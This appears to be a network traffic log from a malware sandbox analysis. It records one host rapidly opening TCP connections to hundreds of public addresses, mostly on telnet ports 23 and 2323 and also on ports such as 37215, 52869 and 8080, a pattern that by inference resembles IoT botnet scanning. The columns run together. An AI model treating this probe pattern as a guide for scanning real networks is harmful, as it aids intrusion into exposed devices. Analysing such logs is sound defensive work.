                                                                        Dec 6, 2024 00:37:19.875432968 CET4197323192.168.2.2367.165.242.167
                                                                        Dec 6, 2024 00:37:19.875432968 CET4197323192.168.2.234.163.244.211
                                                                        Dec 6, 2024 00:37:19.875442982 CET4197323192.168.2.23123.14.199.122
                                                                        Dec 6, 2024 00:37:19.875453949 CET4197323192.168.2.23160.117.177.121
                                                                        Dec 6, 2024 00:37:19.875468016 CET419732323192.168.2.2365.197.89.76
                                                                        Dec 6, 2024 00:37:19.875471115 CET4197323192.168.2.2378.181.255.79
                                                                        Dec 6, 2024 00:37:19.875483036 CET4197323192.168.2.2346.99.20.106
                                                                        Dec 6, 2024 00:37:19.875488043 CET4197323192.168.2.23221.25.230.85
                                                                        Dec 6, 2024 00:37:19.875502110 CET4197323192.168.2.2375.139.28.217
                                                                        Dec 6, 2024 00:37:19.875504017 CET4197323192.168.2.239.234.64.245
                                                                        Dec 6, 2024 00:37:19.875505924 CET4197323192.168.2.23213.112.21.199
                                                                        Dec 6, 2024 00:37:19.875514030 CET4197323192.168.2.2362.212.215.169
                                                                        Dec 6, 2024 00:37:19.875524044 CET4197323192.168.2.2338.64.136.84
                                                                        Dec 6, 2024 00:37:19.875525951 CET4197323192.168.2.23219.4.104.157
                                                                        Dec 6, 2024 00:37:19.875525951 CET4197323192.168.2.2387.248.165.132
                                                                        Dec 6, 2024 00:37:19.920882940 CET4901823192.168.2.23121.217.110.88
                                                                        Dec 6, 2024 00:37:19.920882940 CET3952423192.168.2.2396.91.144.148
                                                                        Dec 6, 2024 00:37:19.920882940 CET5819423192.168.2.2348.70.117.66
                                                                        Dec 6, 2024 00:37:19.920902014 CET4389023192.168.2.23113.124.80.62
                                                                        Dec 6, 2024 00:37:19.920906067 CET4256623192.168.2.2397.5.60.192
                                                                        Dec 6, 2024 00:37:19.952929020 CET4795423192.168.2.23147.176.173.211
                                                                        Dec 6, 2024 00:37:19.952928066 CET5634823192.168.2.23209.255.0.253
                                                                        Dec 6, 2024 00:37:19.952939987 CET3361023192.168.2.23157.137.146.189
                                                                        Dec 6, 2024 00:37:19.952943087 CET3359423192.168.2.23164.138.192.93
                                                                        Dec 6, 2024 00:37:19.952945948 CET5037623192.168.2.2327.159.149.172
                                                                        Dec 6, 2024 00:37:19.952946901 CET5951423192.168.2.23102.130.32.60
                                                                        Dec 6, 2024 00:37:19.952946901 CET4422223192.168.2.23207.82.121.152
                                                                        Dec 6, 2024 00:37:19.952948093 CET6086823192.168.2.2383.157.195.180
                                                                        Dec 6, 2024 00:37:19.952960014 CET3830623192.168.2.23222.24.226.145
                                                                        Dec 6, 2024 00:37:19.952960968 CET4836423192.168.2.23164.249.98.103
                                                                        Dec 6, 2024 00:37:19.952960014 CET5246023192.168.2.23122.9.169.120
                                                                        Dec 6, 2024 00:37:19.952960968 CET4220223192.168.2.2365.32.165.242
                                                                        Dec 6, 2024 00:37:19.952960968 CET5224423192.168.2.23160.65.201.233
                                                                        Dec 6, 2024 00:37:19.952959061 CET5769423192.168.2.2396.66.24.79
                                                                        Dec 6, 2024 00:37:19.952960968 CET3877023192.168.2.2360.242.100.109
                                                                        Dec 6, 2024 00:37:19.952964067 CET3551623192.168.2.2318.110.245.21
                                                                        Dec 6, 2024 00:37:19.952959061 CET410182323192.168.2.23184.229.170.8
                                                                        Dec 6, 2024 00:37:19.952964067 CET3627623192.168.2.23219.211.57.45
                                                                        Dec 6, 2024 00:37:19.952975988 CET472222323192.168.2.2354.134.139.3
                                                                        Dec 6, 2024 00:37:19.952975988 CET3964423192.168.2.23142.114.52.5
                                                                        Dec 6, 2024 00:37:19.952979088 CET3764023192.168.2.2362.38.150.102
                                                                        Dec 6, 2024 00:37:19.952980042 CET3433623192.168.2.23190.16.1.22
                                                                        Dec 6, 2024 00:37:19.952986956 CET3441623192.168.2.2354.120.112.89
                                                                        Dec 6, 2024 00:37:19.952997923 CET386822323192.168.2.23221.227.182.211
                                                                        Dec 6, 2024 00:37:19.952997923 CET5504623192.168.2.23162.33.119.110
                                                                        Dec 6, 2024 00:37:19.953001022 CET5483623192.168.2.23118.246.223.115
                                                                        Dec 6, 2024 00:37:19.965868950 CET5752637215192.168.2.234.9.133.235
                                                                        Dec 6, 2024 00:37:19.984869003 CET4887423192.168.2.2341.95.190.93
                                                                        Dec 6, 2024 00:37:19.984874964 CET4227223192.168.2.23179.35.0.58
                                                                        Dec 6, 2024 00:37:19.984874964 CET3719023192.168.2.2398.125.228.239
                                                                        Dec 6, 2024 00:37:19.984888077 CET5901223192.168.2.23202.187.231.183
                                                                        Dec 6, 2024 00:37:19.984888077 CET4238023192.168.2.23139.13.181.120
                                                                        Dec 6, 2024 00:37:19.984893084 CET5009823192.168.2.2389.144.65.151
                                                                        Dec 6, 2024 00:37:19.984894037 CET3677423192.168.2.23218.132.131.8
                                                                        Dec 6, 2024 00:37:19.984894037 CET5063823192.168.2.23124.10.94.11
                                                                        Dec 6, 2024 00:37:19.984894037 CET5473823192.168.2.23109.148.121.248
                                                                        Dec 6, 2024 00:37:19.984894037 CET5096823192.168.2.2367.230.54.128
                                                                        Dec 6, 2024 00:37:19.984901905 CET4790023192.168.2.23177.150.243.129
                                                                        Dec 6, 2024 00:37:19.984910965 CET5309623192.168.2.2395.107.188.159
                                                                        Dec 6, 2024 00:37:19.984910965 CET4989623192.168.2.23101.9.151.69
                                                                        Dec 6, 2024 00:37:19.984911919 CET5619423192.168.2.23174.8.198.80
                                                                        Dec 6, 2024 00:37:19.984924078 CET4132023192.168.2.23150.200.234.131
                                                                        Dec 6, 2024 00:37:19.984926939 CET6051623192.168.2.23187.42.208.196
                                                                        Dec 6, 2024 00:37:19.984931946 CET5168423192.168.2.23223.238.115.56
                                                                        Dec 6, 2024 00:37:19.984931946 CET5983480192.168.2.23205.98.197.63
                                                                        Dec 6, 2024 00:37:19.984931946 CET476662323192.168.2.2385.142.188.42
                                                                        Dec 6, 2024 00:37:19.984940052 CET4453280192.168.2.2382.180.191.163
                                                                        Dec 6, 2024 00:37:19.984941959 CET5048623192.168.2.23218.70.68.120
                                                                        Dec 6, 2024 00:37:19.984941959 CET397788443192.168.2.2384.206.141.173
                                                                        Dec 6, 2024 00:37:19.984941959 CET578325555192.168.2.2358.53.226.166
                                                                        Dec 6, 2024 00:37:19.984947920 CET3494023192.168.2.23185.169.132.67
                                                                        Dec 6, 2024 00:37:19.984955072 CET4205223192.168.2.23217.64.12.197
                                                                        Dec 6, 2024 00:37:19.984955072 CET584648080192.168.2.23219.150.117.23
                                                                        Dec 6, 2024 00:37:19.984958887 CET5323880192.168.2.2394.148.88.247
                                                                        Dec 6, 2024 00:37:19.984962940 CET4695280192.168.2.2398.209.25.94
                                                                        Dec 6, 2024 00:37:19.984962940 CET3741449152192.168.2.2385.233.54.179
                                                                        Dec 6, 2024 00:37:19.994429111 CET234197396.155.12.39192.168.2.23
                                                                        Dec 6, 2024 00:37:19.994486094 CET4197323192.168.2.2396.155.12.39
                                                                        Dec 6, 2024 00:37:19.997977018 CET102341973204.102.185.215192.168.2.23
                                                                        Dec 6, 2024 00:37:19.997988939 CET234197377.173.238.10192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998001099 CET2341973166.232.173.44192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998023987 CET234197388.68.53.235192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998033047 CET234197358.28.50.46192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998034954 CET419731023192.168.2.23204.102.185.215
                                                                        Dec 6, 2024 00:37:19.998044014 CET4197323192.168.2.23166.232.173.44
                                                                        Dec 6, 2024 00:37:19.998044968 CET4197323192.168.2.2377.173.238.10
                                                                        Dec 6, 2024 00:37:19.998058081 CET4197323192.168.2.2388.68.53.235
                                                                        Dec 6, 2024 00:37:19.998058081 CET2341973150.28.185.61192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998069048 CET234197375.46.50.124192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998079062 CET4197323192.168.2.2358.28.50.46
                                                                        Dec 6, 2024 00:37:19.998101950 CET234197384.104.211.138192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998101950 CET4197323192.168.2.23150.28.185.61
                                                                        Dec 6, 2024 00:37:19.998104095 CET4197323192.168.2.2375.46.50.124
                                                                        Dec 6, 2024 00:37:19.998111963 CET2341973180.207.173.217192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998126030 CET232341973167.249.180.104192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998152018 CET4197323192.168.2.2384.104.211.138
                                                                        Dec 6, 2024 00:37:19.998152018 CET4197323192.168.2.23180.207.173.217
                                                                        Dec 6, 2024 00:37:19.998164892 CET419732323192.168.2.23167.249.180.104
                                                                        Dec 6, 2024 00:37:19.998251915 CET234197378.61.63.46192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998261929 CET2341973178.212.38.61192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998270988 CET2341973142.8.141.157192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998281002 CET234197399.48.81.196192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998291016 CET2341973180.191.101.50192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998291016 CET4197323192.168.2.23178.212.38.61
                                                                        Dec 6, 2024 00:37:19.998291969 CET4197323192.168.2.2378.61.63.46
                                                                        Dec 6, 2024 00:37:19.998306036 CET2341973104.165.203.153192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998313904 CET4197323192.168.2.23142.8.141.157
                                                                        Dec 6, 2024 00:37:19.998313904 CET4197323192.168.2.2399.48.81.196
                                                                        Dec 6, 2024 00:37:19.998316050 CET2341973117.7.217.249192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998316050 CET4197323192.168.2.23180.191.101.50
                                                                        Dec 6, 2024 00:37:19.998327971 CET2341973125.67.89.137192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998337984 CET23234197392.192.78.128192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998347044 CET4197323192.168.2.23104.165.203.153
                                                                        Dec 6, 2024 00:37:19.998347998 CET23419738.56.252.46192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998358011 CET2341973160.128.148.40192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998366117 CET419732323192.168.2.2392.192.78.128
                                                                        Dec 6, 2024 00:37:19.998368025 CET234197341.149.222.11192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998368025 CET4197323192.168.2.23117.7.217.249
                                                                        Dec 6, 2024 00:37:19.998368025 CET4197323192.168.2.23125.67.89.137
                                                                        Dec 6, 2024 00:37:19.998378038 CET2341973170.45.112.72192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998382092 CET4197323192.168.2.23160.128.148.40
                                                                        Dec 6, 2024 00:37:19.998383999 CET4197323192.168.2.238.56.252.46
                                                                        Dec 6, 2024 00:37:19.998388052 CET2341973200.105.240.150192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998398066 CET234197314.95.150.195192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998404026 CET4197323192.168.2.23170.45.112.72
                                                                        Dec 6, 2024 00:37:19.998404026 CET4197323192.168.2.2341.149.222.11
                                                                        Dec 6, 2024 00:37:19.998405933 CET234197339.46.113.169192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998423100 CET234197371.235.34.44192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998425961 CET4197323192.168.2.23200.105.240.150
                                                                        Dec 6, 2024 00:37:19.998430967 CET4197323192.168.2.2314.95.150.195
                                                                        Dec 6, 2024 00:37:19.998430967 CET4197323192.168.2.2339.46.113.169
                                                                        Dec 6, 2024 00:37:19.998433113 CET232341973101.199.177.66192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998471975 CET4197323192.168.2.2371.235.34.44
                                                                        Dec 6, 2024 00:37:19.998471975 CET419732323192.168.2.23101.199.177.66
                                                                        Dec 6, 2024 00:37:19.998763084 CET2341973150.7.176.143192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998773098 CET234197336.124.101.109192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998785973 CET234197380.246.107.123192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998800039 CET234197340.157.151.207192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998800039 CET4197323192.168.2.23150.7.176.143
                                                                        Dec 6, 2024 00:37:19.998805046 CET4197323192.168.2.2336.124.101.109
                                                                        Dec 6, 2024 00:37:19.998805046 CET4197323192.168.2.2380.246.107.123
                                                                        Dec 6, 2024 00:37:19.998836994 CET4197323192.168.2.2340.157.151.207
                                                                        Dec 6, 2024 00:37:19.998847961 CET234197347.162.80.82192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998864889 CET234197370.128.116.86192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998874903 CET2341973178.18.210.159192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998888969 CET4197323192.168.2.2347.162.80.82
                                                                        Dec 6, 2024 00:37:19.998893023 CET234197368.246.22.53192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998902082 CET4197323192.168.2.2370.128.116.86
                                                                        Dec 6, 2024 00:37:19.998905897 CET4197323192.168.2.23178.18.210.159
                                                                        Dec 6, 2024 00:37:19.998907089 CET2341973104.157.11.224192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998919010 CET23234197364.255.112.7192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998927116 CET4197323192.168.2.2368.246.22.53
                                                                        Dec 6, 2024 00:37:19.998944044 CET4197323192.168.2.23104.157.11.224
                                                                        Dec 6, 2024 00:37:19.998950958 CET419732323192.168.2.2364.255.112.7
                                                                        Dec 6, 2024 00:37:19.998953104 CET234197342.194.156.96192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998961926 CET234197367.103.22.145192.168.2.23
                                                                        Dec 6, 2024 00:37:19.998986006 CET4197323192.168.2.2367.103.22.145
                                                                        Dec 6, 2024 00:37:19.998990059 CET4197323192.168.2.2342.194.156.96
                                                                        Dec 6, 2024 00:37:19.999020100 CET2341973174.76.147.182192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999037981 CET2341973204.185.46.107192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999047995 CET2341973106.44.75.210192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999056101 CET2341973146.108.209.82192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999057055 CET4197323192.168.2.23174.76.147.182
                                                                        Dec 6, 2024 00:37:19.999070883 CET4197323192.168.2.23106.44.75.210
                                                                        Dec 6, 2024 00:37:19.999072075 CET4197323192.168.2.23204.185.46.107
                                                                        Dec 6, 2024 00:37:19.999073029 CET23419738.81.112.120192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999074936 CET4197323192.168.2.23146.108.209.82
                                                                        Dec 6, 2024 00:37:19.999084949 CET2341973196.249.103.247192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999094963 CET2341973220.115.209.204192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999114037 CET4197323192.168.2.238.81.112.120
                                                                        Dec 6, 2024 00:37:19.999126911 CET4197323192.168.2.23196.249.103.247
                                                                        Dec 6, 2024 00:37:19.999135017 CET4197323192.168.2.23220.115.209.204
                                                                        Dec 6, 2024 00:37:19.999161959 CET2341973157.199.119.151192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999171972 CET23234197334.45.121.231192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999181032 CET234197392.68.213.116192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999190092 CET2341973223.190.30.2192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999198914 CET2341973163.3.5.69192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999200106 CET4197323192.168.2.23157.199.119.151
                                                                        Dec 6, 2024 00:37:19.999202967 CET419732323192.168.2.2334.45.121.231
                                                                        Dec 6, 2024 00:37:19.999209881 CET234197341.160.17.189192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999217987 CET4197323192.168.2.23223.190.30.2
                                                                        Dec 6, 2024 00:37:19.999218941 CET2341973121.210.90.162192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999221087 CET4197323192.168.2.2392.68.213.116
                                                                        Dec 6, 2024 00:37:19.999229908 CET2341973222.169.132.35192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999233961 CET4197323192.168.2.23163.3.5.69
                                                                        Dec 6, 2024 00:37:19.999239922 CET2341973207.46.95.177192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999248981 CET4197323192.168.2.2341.160.17.189
                                                                        Dec 6, 2024 00:37:19.999254942 CET4197323192.168.2.23121.210.90.162
                                                                        Dec 6, 2024 00:37:19.999262094 CET4197323192.168.2.23222.169.132.35
                                                                        Dec 6, 2024 00:37:19.999274969 CET4197323192.168.2.23207.46.95.177
                                                                        Dec 6, 2024 00:37:19.999277115 CET2341973113.99.253.185192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999288082 CET2341973109.78.233.145192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999295950 CET232341973197.17.198.210192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999305964 CET2341973130.224.230.1192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999321938 CET2341973219.99.15.243192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999322891 CET4197323192.168.2.23113.99.253.185
                                                                        Dec 6, 2024 00:37:19.999329090 CET4197323192.168.2.23109.78.233.145
                                                                        Dec 6, 2024 00:37:19.999332905 CET419732323192.168.2.23197.17.198.210
                                                                        Dec 6, 2024 00:37:19.999340057 CET4197323192.168.2.23130.224.230.1
                                                                        Dec 6, 2024 00:37:19.999366045 CET4197323192.168.2.23219.99.15.243
                                                                        Dec 6, 2024 00:37:19.999696016 CET2341973112.96.123.35192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999711037 CET234197390.224.99.176192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999727011 CET234197366.245.250.181192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999732018 CET4197323192.168.2.23112.96.123.35
                                                                        Dec 6, 2024 00:37:19.999744892 CET2341973172.152.238.104192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999748945 CET4197323192.168.2.2390.224.99.176
                                                                        Dec 6, 2024 00:37:19.999759912 CET2323419739.17.168.175192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999771118 CET4197323192.168.2.2366.245.250.181
                                                                        Dec 6, 2024 00:37:19.999773026 CET234197339.134.200.107192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999777079 CET4197323192.168.2.23172.152.238.104
                                                                        Dec 6, 2024 00:37:19.999787092 CET419732323192.168.2.239.17.168.175
                                                                        Dec 6, 2024 00:37:19.999810934 CET4197323192.168.2.2339.134.200.107
                                                                        Dec 6, 2024 00:37:19.999840021 CET2341973170.82.10.180192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999855995 CET2341973203.73.47.231192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999865055 CET2341973184.70.91.182192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999876022 CET234197344.100.226.170192.168.2.23
                                                                        Dec 6, 2024 00:37:19.999886990 CET4197323192.168.2.23170.82.10.180
                                                                        Dec 6, 2024 00:37:19.999895096 CET4197323192.168.2.23203.73.47.231
                                                                        Dec 6, 2024 00:37:19.999907970 CET4197323192.168.2.23184.70.91.182
                                                                        Dec 6, 2024 00:37:19.999907970 CET4197323192.168.2.2344.100.226.170
                                                                        Dec 6, 2024 00:37:19.999995947 CET2341973223.128.225.138192.168.2.23
                                                                        Dec 6, 2024 00:37:20.000005960 CET2341973161.190.213.74192.168.2.23
                                                                        Dec 6, 2024 00:37:20.000015974 CET23419735.189.185.126192.168.2.23
                                                                        Dec 6, 2024 00:37:20.000026941 CET2341973211.234.111.111192.168.2.23
                                                                        Dec 6, 2024 00:37:20.000036001 CET2341973118.85.178.144192.168.2.23
                                                                        Dec 6, 2024 00:37:20.000036001 CET4197323192.168.2.23223.128.225.138
                                                                        Dec 6, 2024 00:37:20.000036001 CET4197323192.168.2.235.189.185.126
                                                                        Dec 6, 2024 00:37:20.000039101 CET4197323192.168.2.23161.190.213.74
                                                                        Dec 6, 2024 00:37:20.000046015 CET23234197362.47.240.180192.168.2.23
                                                                        Dec 6, 2024 00:37:20.000056028 CET234197363.206.176.17192.168.2.23
                                                                        Dec 6, 2024 00:37:20.000063896 CET4197323192.168.2.23211.234.111.111
                                                                        Dec 6, 2024 00:37:20.000066996 CET4197323192.168.2.23118.85.178.144
                                                                        Dec 6, 2024 00:37:20.000082016 CET4197323192.168.2.2363.206.176.17
                                                                        Dec 6, 2024 00:37:20.000082016 CET419732323192.168.2.2362.47.240.180
                                                                        Dec 6, 2024 00:37:20.016874075 CET5225023192.168.2.23213.145.174.181
                                                                        Dec 6, 2024 00:37:20.016880035 CET3887880192.168.2.23141.86.150.190
                                                                        Dec 6, 2024 00:37:20.016887903 CET3731623192.168.2.23102.54.112.110
                                                                        Dec 6, 2024 00:37:20.016891956 CET4209023192.168.2.23121.18.219.80
                                                                        Dec 6, 2024 00:37:20.016891956 CET533728080192.168.2.2347.181.199.10
                                                                        Dec 6, 2024 00:37:20.016901016 CET5181823192.168.2.23165.136.65.75
                                                                        Dec 6, 2024 00:37:20.016901016 CET381141023192.168.2.23181.69.108.246
                                                                        Dec 6, 2024 00:37:20.016911983 CET346068080192.168.2.23117.98.229.116
                                                                        Dec 6, 2024 00:37:20.016921997 CET5697249152192.168.2.23168.17.167.43
                                                                        Dec 6, 2024 00:37:20.016933918 CET4183423192.168.2.23210.63.192.243
                                                                        Dec 6, 2024 00:37:20.016938925 CET3307081192.168.2.23204.141.142.65
                                                                        Dec 6, 2024 00:37:20.016946077 CET3281423192.168.2.2345.162.46.130
                                                                        Dec 6, 2024 00:37:20.016951084 CET4990423192.168.2.2323.11.44.230
                                                                        Dec 6, 2024 00:37:20.016952038 CET5342880192.168.2.2321.129.156.240
                                                                        Dec 6, 2024 00:37:20.016959906 CET5073449152192.168.2.2328.160.95.81
                                                                        Dec 6, 2024 00:37:20.016962051 CET4548480192.168.2.2331.254.104.174
                                                                        Dec 6, 2024 00:37:20.016962051 CET6034023192.168.2.23185.89.66.87
                                                                        Dec 6, 2024 00:37:20.016964912 CET5138023192.168.2.23173.136.2.215
                                                                        Dec 6, 2024 00:37:20.016964912 CET5285023192.168.2.23212.252.159.20
                                                                        Dec 6, 2024 00:37:20.016964912 CET5500849152192.168.2.239.240.79.151
                                                                        Dec 6, 2024 00:37:20.016966105 CET572328080192.168.2.2390.10.48.55
                                                                        Dec 6, 2024 00:37:20.016966105 CET4481849152192.168.2.23163.224.129.253
                                                                        Dec 6, 2024 00:37:20.016966105 CET433007574192.168.2.23158.199.219.52
                                                                        Dec 6, 2024 00:37:20.016968966 CET3627623192.168.2.2340.17.181.231
                                                                        Dec 6, 2024 00:37:20.016966105 CET3555481192.168.2.23115.97.132.142
                                                                        Dec 6, 2024 00:37:20.016971111 CET5828023192.168.2.2370.169.138.45
                                                                        Dec 6, 2024 00:37:20.016974926 CET5111681192.168.2.23142.104.57.83
                                                                        Dec 6, 2024 00:37:20.021428108 CET808053430208.155.120.85192.168.2.23
                                                                        Dec 6, 2024 00:37:20.043423891 CET2349018121.217.110.88192.168.2.23
                                                                        Dec 6, 2024 00:37:20.043438911 CET233952496.91.144.148192.168.2.23
                                                                        Dec 6, 2024 00:37:20.043489933 CET235819448.70.117.66192.168.2.23
                                                                        Dec 6, 2024 00:37:20.043500900 CET4901823192.168.2.23121.217.110.88
                                                                        Dec 6, 2024 00:37:20.043503046 CET3952423192.168.2.2396.91.144.148
                                                                        Dec 6, 2024 00:37:20.043531895 CET5819423192.168.2.2348.70.117.66
                                                                        Dec 6, 2024 00:37:20.043816090 CET2343890113.124.80.62192.168.2.23
                                                                        Dec 6, 2024 00:37:20.043854952 CET4389023192.168.2.23113.124.80.62
                                                                        Dec 6, 2024 00:37:20.048851967 CET5014080192.168.2.23123.98.76.113
                                                                        Dec 6, 2024 00:37:20.048851967 CET4970023192.168.2.23103.90.69.101
                                                                        Dec 6, 2024 00:37:20.048854113 CET5001623192.168.2.2345.163.247.116
                                                                        Dec 6, 2024 00:37:20.048871040 CET373348080192.168.2.2393.100.195.82
                                                                        Dec 6, 2024 00:37:20.048878908 CET460208080192.168.2.2395.40.78.21
                                                                        Dec 6, 2024 00:37:20.048880100 CET4310023192.168.2.23151.148.78.149
                                                                        Dec 6, 2024 00:37:20.048880100 CET5265023192.168.2.2357.37.47.90
                                                                        Dec 6, 2024 00:37:20.048887014 CET5060449152192.168.2.2380.19.37.100
                                                                        Dec 6, 2024 00:37:20.048887014 CET4707023192.168.2.23209.130.127.153
                                                                        Dec 6, 2024 00:37:20.048892975 CET3981423192.168.2.23110.139.97.138
                                                                        Dec 6, 2024 00:37:20.048899889 CET4573423192.168.2.23125.94.78.10
                                                                        Dec 6, 2024 00:37:20.048901081 CET4660080192.168.2.23168.72.171.49
                                                                        Dec 6, 2024 00:37:20.048906088 CET4373481192.168.2.2375.3.76.235
                                                                        Dec 6, 2024 00:37:20.048907995 CET350522323192.168.2.2379.173.177.69
                                                                        Dec 6, 2024 00:37:20.048918962 CET5607880192.168.2.2388.198.102.176
                                                                        Dec 6, 2024 00:37:20.048918962 CET5460023192.168.2.2398.242.48.207
                                                                        Dec 6, 2024 00:37:20.048926115 CET4241037215192.168.2.2366.196.187.145
                                                                        Dec 6, 2024 00:37:20.048934937 CET5586223192.168.2.2334.6.47.75
                                                                        Dec 6, 2024 00:37:20.048934937 CET432485555192.168.2.2315.232.41.12
                                                                        Dec 6, 2024 00:37:20.048944950 CET5609023192.168.2.2371.137.6.48
                                                                        Dec 6, 2024 00:37:20.048944950 CET4185623192.168.2.2363.151.178.96
                                                                        Dec 6, 2024 00:37:20.048944950 CET368887574192.168.2.23131.126.97.144
                                                                        Dec 6, 2024 00:37:20.048959970 CET342808080192.168.2.23210.244.159.221
                                                                        Dec 6, 2024 00:37:20.075634956 CET2347954147.176.173.211192.168.2.23
                                                                        Dec 6, 2024 00:37:20.075645924 CET2356348209.255.0.253192.168.2.23
                                                                        Dec 6, 2024 00:37:20.075654984 CET2333610157.137.146.189192.168.2.23
                                                                        Dec 6, 2024 00:37:20.075664997 CET2333594164.138.192.93192.168.2.23
                                                                        Dec 6, 2024 00:37:20.075681925 CET5634823192.168.2.23209.255.0.253
                                                                        Dec 6, 2024 00:37:20.075683117 CET4795423192.168.2.23147.176.173.211
                                                                        Dec 6, 2024 00:37:20.075696945 CET3361023192.168.2.23157.137.146.189
                                                                        Dec 6, 2024 00:37:20.075697899 CET3359423192.168.2.23164.138.192.93
                                                                        Dec 6, 2024 00:37:20.080853939 CET5487823192.168.2.232.7.198.101
                                                                        Dec 6, 2024 00:37:20.080857038 CET3312080192.168.2.23118.165.85.54
                                                                        Dec 6, 2024 00:37:20.080867052 CET367988080192.168.2.23197.137.52.118
                                                                        Dec 6, 2024 00:37:20.080872059 CET365302323192.168.2.2386.155.137.194
                                                                        Dec 6, 2024 00:37:20.080873013 CET4528623192.168.2.2378.10.102.90
                                                                        Dec 6, 2024 00:37:20.080876112 CET3335649152192.168.2.23165.171.117.177
                                                                        Dec 6, 2024 00:37:20.080877066 CET5852023192.168.2.23140.235.222.223
                                                                        Dec 6, 2024 00:37:20.080884933 CET4563623192.168.2.23145.174.183.126
                                                                        Dec 6, 2024 00:37:20.080884933 CET464188080192.168.2.23126.36.158.37
                                                                        Dec 6, 2024 00:37:20.080893993 CET5970080192.168.2.23147.71.242.44
                                                                        Dec 6, 2024 00:37:20.080899000 CET4184280192.168.2.23166.226.195.139
                                                                        Dec 6, 2024 00:37:20.080899954 CET6069223192.168.2.23217.11.150.181
                                                                        Dec 6, 2024 00:37:20.080899954 CET4974080192.168.2.23215.24.117.33
                                                                        Dec 6, 2024 00:37:20.080902100 CET3491223192.168.2.2319.75.47.225
                                                                        Dec 6, 2024 00:37:20.080913067 CET5261223192.168.2.2368.31.102.175
                                                                        Dec 6, 2024 00:37:20.080919981 CET5887249152192.168.2.23205.201.136.32
                                                                        Dec 6, 2024 00:37:20.080919981 CET341265555192.168.2.2388.136.117.16
                                                                        Dec 6, 2024 00:37:20.080923080 CET5850249152192.168.2.23192.169.190.168
                                                                        Dec 6, 2024 00:37:20.080929995 CET3493252869192.168.2.2371.27.36.237
                                                                        Dec 6, 2024 00:37:20.080929995 CET4416423192.168.2.23196.218.227.138
                                                                        Dec 6, 2024 00:37:20.080939054 CET3660023192.168.2.23124.178.178.153
                                                                        Dec 6, 2024 00:37:20.080941916 CET385122323192.168.2.23125.40.65.165
                                                                        Dec 6, 2024 00:37:20.080943108 CET3724280192.168.2.2356.147.212.235
                                                                        Dec 6, 2024 00:37:20.080945015 CET4532637215192.168.2.2342.73.247.81
                                                                        Dec 6, 2024 00:37:20.080960035 CET512305555192.168.2.23161.6.125.245
                                                                        Dec 6, 2024 00:37:20.080960989 CET5189423192.168.2.2382.210.121.89
                                                                        Dec 6, 2024 00:37:20.080964088 CET3375423192.168.2.23136.46.241.228
                                                                        Dec 6, 2024 00:37:20.080965042 CET5941223192.168.2.2382.228.10.195
                                                                        Dec 6, 2024 00:37:20.086150885 CET37215575264.9.133.235192.168.2.23
                                                                        Dec 6, 2024 00:37:20.086195946 CET5752637215192.168.2.234.9.133.235
                                                                        Dec 6, 2024 00:37:20.105586052 CET2342272179.35.0.58192.168.2.23
                                                                        Dec 6, 2024 00:37:20.105612040 CET234887441.95.190.93192.168.2.23
